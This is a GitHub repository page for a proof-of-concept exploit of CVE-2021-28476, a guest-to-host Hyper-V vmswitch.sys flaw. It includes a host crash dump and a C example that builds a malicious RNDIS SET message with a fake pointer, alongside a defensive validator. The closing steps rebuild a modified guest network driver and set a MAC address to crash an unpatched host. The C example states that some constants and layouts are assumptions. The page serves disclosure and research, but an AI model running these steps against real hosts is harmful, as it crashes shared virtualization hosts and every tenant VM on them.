• This repository has been archived on 27/Dec/2023
• Stars: 217
• Rank 182,446 (Top 4 %)
• Language: C
• License: MIT License
• Created over 3 years ago
• Updated over 3 years ago

Repository Details

CVE-2021-28476: a guest-to-host "Microsoft Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys.

This is a proof of concept for CVE-2021-28476 ("Hyper-V Remote Code Execution Vulnerability"), an arbitrary memory read in vmswitch.sys (the Hyper-V network virtualization service provider, which runs in the root partition) that a guest can trigger. Microsoft patched it in May 2021.

[image: rel04vsrel05]

The vulnerability was found by @australeo, @ergot86, @peleghd and @OphirHarpaz. It is triggerable by a guest virtual machine sending a malicious RNDIS packet over VMBus, the channel-based mechanism Hyper-V uses for communication between partitions (here, from the guest to the root partition).

[image: trigger]

This is what the host system crash looks like in a debugger (bugcheck 0x7E, SYSTEM_THREAD_EXCEPTION_NOT_HANDLED, whose first parameter 0xC0000005 is an access violation at the faulting instruction):

*** Fatal System Error: 0x0000007e
                       (0xFFFFFFFFC0000005,0xFFFFF80AD4A41A63,0xFFFFB70DD7EB7028,0xFFFFB70DD7EB6860)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff801`31412c50 cc              int     3

kd> .cxr 0xffffb70dd7eb6860
rax=fffff80ad4bc7214 rbx=fffff80ad4bf62a0 rcx=0000000000000000
rdx=00000000047a2807 rsi=ffffb70dd7eb7420 rdi=ffffa58caa318f00
rip=fffff80ad4a41a63 rsp=ffffb70dd7eb7260 rbp=ffffa58caa318fe0
 r8=0000000000000000  r9=000000000000013b r10=deadbeefbaadc0be
r11=ffffb70dd7eb7230 r12=fffff80ad4bc73d0 r13=00000000c0000001
r14=00000000000021f0 r15=fffff80ad4bc7360
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050246
vmswitch!VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST+0xfb:
fffff80a`d4a41a63 418b4a20        mov     ecx,dword ptr [r10+20h] ds:002b:deadbeef`baadc0de=????????

kd> kp
 # Child-SP          RetAddr               Call Site
00 ffffb70d`d7eb7260 fffff80a`d4a3ee41     vmswitch!VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST+0xfb
01 ffffb70d`d7eb7300 fffff80a`d4a3fc76     vmswitch!VmsIfrInfoParamsNdisOidRequestBuffer+0x14d
02 ffffb70d`d7eb7380 fffff80a`d4a3c779     vmswitch!RndisDevHostHandleSetMessage+0x196
03 ffffb70d`d7eb7420 fffff801`3136f423     vmswitch!RndisDevHostControlMessageWorkerRoutine+0x199
04 ffffb70d`d7eb74c0 fffff801`3123a975     nt!IopProcessWorkItem+0x93
05 ffffb70d`d7eb7530 fffff801`3132ce85     nt!ExpWorkerThread+0x105
06 ffffb70d`d7eb75d0 fffff801`31412408     nt!PspSystemThreadStartup+0x55
07 ffffb70d`d7eb7620 00000000`00000000     nt!KiStartSystemThread+0x28

The bug itself is in VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST, a function that can be reached with attacker-controlled data (which should never be possible) and that double-dereferences a pointer (boom->_win in the screenshot below) supplied by the malicious guest virtual machine.

[image: boom]
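The guest-to-host exchange described above, and the check the host was missing, as an added example in C that is not code from this repository or from vmswitch.sys. It serializes a RemoteNdisSetMsg the way a guest would, runs a host-side validator that bounds-checks the information buffer and applies an OID allow-list before any OID-specific handler sees the bytes, and shows, with a hypothetical buffer layout, how accepting OID_SWITCH_NIC_REQUEST turns guest bytes into a host pointer. Assumptions: the numeric value used for OID_SWITCH_NIC_REQUEST is recalled from ntddndis.h and should be verified against the WDK; the pointer-at-offset-0 layout in nic_request_first_deref_target stands in for the real vmswitch structure; the 0xdeadbeefbaadc0be payload is a constructed input chosen to match r10 in the crash dump.

```c
/* Added example, not code from this repository or from vmswitch.sys: a RNDIS SET message
 * as a guest builds it, the host-side checks that must precede any OID-specific parsing,
 * and what accepting a switch-internal OID turns guest bytes into. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RNDIS_MSG_SET                 0x00000005u /* RemoteNdisSetMsg (RNDIS spec) */
#define RNDIS_SET_HDR_LEN             28u         /* seven little-endian u32 fields */
#define OID_GEN_CURRENT_PACKET_FILTER 0x0001010Eu /* NDIS OIDs a guest NIC legitimately sets */
#define OID_802_3_CURRENT_ADDRESS     0x01010102u
#define OID_802_3_MULTICAST_LIST      0x01010103u
/* Hyper-V extensible-switch OID, host-internal. Numeric value is an assumption recalled
 * from ntddndis.h; verify it against the WDK. */
#define OID_SWITCH_NIC_REQUEST        0xFFFF0005u

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Guest side. Wire layout: MessageType, MessageLength, RequestId, Oid, InformationBufferLength,
 * InformationBufferOffset (counted from RequestId), DeviceVcHandle, then the buffer itself. */
size_t rndis_build_set(uint8_t *out, size_t cap, uint32_t req_id, uint32_t oid,
                       const void *info, uint32_t info_len)
{
    size_t total = RNDIS_SET_HDR_LEN + info_len;
    if (cap < total)
        return 0;                               /* caller's buffer too small */
    put_le32(out + 0, RNDIS_MSG_SET);
    put_le32(out + 4, (uint32_t)total);
    put_le32(out + 8, req_id);
    put_le32(out + 12, oid);
    put_le32(out + 16, info_len);
    put_le32(out + 20, RNDIS_SET_HDR_LEN - 8); /* buffer starts right after the header */
    put_le32(out + 24, 0);                      /* DeviceVcHandle, unused */
    memcpy(out + RNDIS_SET_HDR_LEN, info, info_len);
    return total;
}

enum verdict { SET_OK, SET_MALFORMED, SET_OID_DENIED };

/* Allow-list: NIC-level OIDs only; 0xFFFFxxxx switch OIDs never legitimately come from a guest. */
static bool oid_allowed_from_guest(uint32_t oid)
{
    return oid == OID_GEN_CURRENT_PACKET_FILTER || oid == OID_802_3_CURRENT_ADDRESS ||
           oid == OID_802_3_MULTICAST_LIST;
}

/* Host side: bounds-check header and information buffer, then gate on the OID before any
 * OID-specific handler sees the bytes. On SET_OK, *info points into msg. */
enum verdict rndis_host_validate_set(const uint8_t *msg, size_t len,
                                     const uint8_t **info, uint32_t *info_len)
{
    if (len < RNDIS_SET_HDR_LEN || get_le32(msg) != RNDIS_MSG_SET)
        return SET_MALFORMED;
    if (get_le32(msg + 4) != len)                /* MessageLength vs. bytes actually received */
        return SET_MALFORMED;
    uint32_t blen = get_le32(msg + 16), boff = get_le32(msg + 20);
    if (boff > len - 8 || blen > len - 8 - boff) /* subtraction form cannot overflow */
        return SET_MALFORMED;
    if (!oid_allowed_from_guest(get_le32(msg + 12)))
        return SET_OID_DENIED;
    *info = msg + 8 + boff;
    *info_len = blen;
    return SET_OK;
}

/* Shape of the unpatched path: the buffer of an accepted OID_SWITCH_NIC_REQUEST is read as a
 * host structure holding a pointer and a dword at +0x20 is fetched through it ("mov ecx,
 * [r10+20h]" above). Hypothetical layout: pointer at offset 0. Returns the address the host
 * would touch instead of dereferencing it, so this stays runnable in user mode. */
uint64_t nic_request_first_deref_target(const uint8_t *info, uint32_t info_len)
{
    if (info_len < 8)
        return 0;
    uint64_t host_ptr = (uint64_t)get_le32(info) | (uint64_t)get_le32(info + 4) << 32;
    return host_ptr + 0x20;                      /* entirely guest-controlled */
}

/* Constructed input: the guest sends the pointer value seen in r10 in the crash dump; the
 * hardened host rejects it at the OID gate without ever interpreting the buffer. */
enum verdict demo_malicious_set(uint64_t *would_deref)
{
    uint8_t msg[64], info[8];
    const uint64_t fake_ptr = 0xdeadbeefbaadc0beull;
    for (int i = 0; i < 8; i++)
        info[i] = (uint8_t)(fake_ptr >> (8 * i));
    size_t n = rndis_build_set(msg, sizeof msg, 1, OID_SWITCH_NIC_REQUEST, info, sizeof info);
    const uint8_t *buf; uint32_t blen;
    enum verdict v = rndis_host_validate_set(msg, n, &buf, &blen);
    *would_deref = nic_request_first_deref_target(msg + RNDIS_SET_HDR_LEN, sizeof info);
    return v;
}

int main(void)
{
    uint64_t target;
    int v = (int)demo_malicious_set(&target);
    printf("verdict=%d (0 ok, 1 malformed, 2 oid denied); unpatched host would read 0x%llx\n", v, (unsigned long long)target);
    return 0;
}
```

The ordering in rndis_host_validate_set is the point: the allow-list runs before any OID-specific code, so a switch-internal OID is refused while its information buffer is still just bytes. The MessageLength/offset/length checks guard the separate class of bugs where the buffer itself lies about its size.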

If this is interesting to you, @peleghd and @OphirHarpaz will be discussing this in detail, as well as the discovery process, in a BlackHat USA 2021 presentation entitled hAFL1: Our Journey of Fuzzing Hyper-V and Discovering a 0-Day.

Running the PoC

The easiest way to run the PoC is to create a Linux virtual machine running the latest Ubuntu Focal (20.04) on a Hyper-V host that has not received the May 2021 fix.

Once this is done, clone the kernel sources matching the running kernel (the rebuilt module has to match the kernel it is loaded into):

$ uname -a
Linux tourdeforce 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
$ git clone git://kernel.ubuntu.com/ubuntu/ubuntu-focal.git
$ cd ubuntu-focal
$ git checkout Ubuntu-5.4.0-73.82   # tag matching the running 5.4.0-73.82 kernel
$ git checkout -b fbl_vswitch

Replace ~/ubuntu-focal/drivers/net/hyperv/netvsc_drv.c with src/netvsc_drv.c, ~/ubuntu-focal/drivers/net/hyperv/rndis_filter.c with src/rndis_filter.c and ~/ubuntu-focal/drivers/net/hyperv/hyperv_net.h with src/hyperv_net.h (the full diff is in cve-2021-28476.diff), then build the module against the running kernel's configuration:

$ sudo apt-get install git build-essential kernel-package fakeroot libncurses5-dev libssl-dev ccache bison flex libelf-dev dwarves
$ cp /boot/config-5.4.0-73-generic .config   # same configuration as the running kernel
$ make oldconfig
$ make modules                                # slow, but yields the Module.symvers the per-directory rebuild relies on
$ make M=drivers/net/hyperv                   # rebuild only hv_netvsc.ko from the patched sources

Finally, trigger the issue by loading the rebuilt module and changing the Ethernet (MAC) address of the network interface; setting the MAC address goes through netvsc_set_mac_addr, which reaches the code path added in rndis_filter.c. Do this from the VM console rather than over SSH, since unloading hv_netvsc takes the guest's network down, and do it on a dedicated test host, since the host crash takes every VM on it with it:

$ sudo rmmod hv_netvsc && sudo insmod drivers/net/hyperv/hv_netvsc.ko
$ sudo ifconfig eth0 hw ether 00:11:22:33:44:55   # or, with iproute2 only: sudo ip link set dev eth0 address 00:11:22:33:44:55
